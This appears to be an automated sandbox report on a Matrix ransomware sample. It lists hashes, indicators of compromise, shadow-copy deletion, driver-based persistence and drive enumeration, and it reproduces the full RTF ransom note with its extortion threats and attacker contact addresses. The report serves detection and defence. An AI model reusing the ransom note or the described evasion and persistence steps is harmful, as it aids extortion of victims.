matrix | 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7

Analysis

max time kernel
85s
max time network
93s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
13-07-2023 23:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Size

1.2MB
MD5

76b640aa00354e46b29ca7ac2adfd732
SHA1

afebf9d72ba7186afefebf4deda87675621b0b8b
SHA256

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7
SHA512

fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552
SSDEEP

24576:l/SA+2lraRrjSJR5ezmT1dM9tZBrPyvaNn:zXlabPyyN

Score

10^/10

matrix discovery persistence ransomware upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#FOX_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected] \par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 4A73C9FA04A3D7DE\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 4A73C9FA04A3D7DE\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 tINbls9c\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

description	ioc	process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-ma\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\bin\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Microsoft Office\root\rsod\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-tw\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ca-es\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nl-nl\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\cs-cz\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-ae\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\PROOF\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft\Edge\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Mozilla Firefox\defaults\pref\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\locale\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ESEN\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\LISTS\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sv-se\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\es-es\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ca-es\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\en-gb\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\root\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

154 1636 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

deNx4JD364.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS deNx4JD364.exe

flow	pid	process
154	1636	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	deNx4JD364.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

deNx4JD364.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	deNx4JD364.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

wscript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation wscript.exe
Executes dropped EXE 3 IoCs

Processes:

NWpUUoXa.exedeNx4JD3.exedeNx4JD364.exe

pid process

4288 NWpUUoXa.exe
5356 deNx4JD3.exe
5372 deNx4JD364.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exe

pid process

5084 takeown.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation	wscript.exe

pid	process
4288	NWpUUoXa.exe
5356	deNx4JD3.exe
5372	deNx4JD364.exe

pid	process
5084	takeown.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\deNx4JD3.exe	upx
behavioral2/memory/5356-2322-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\deNx4JD3.exe	upx
behavioral2/memory/5356-7150-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

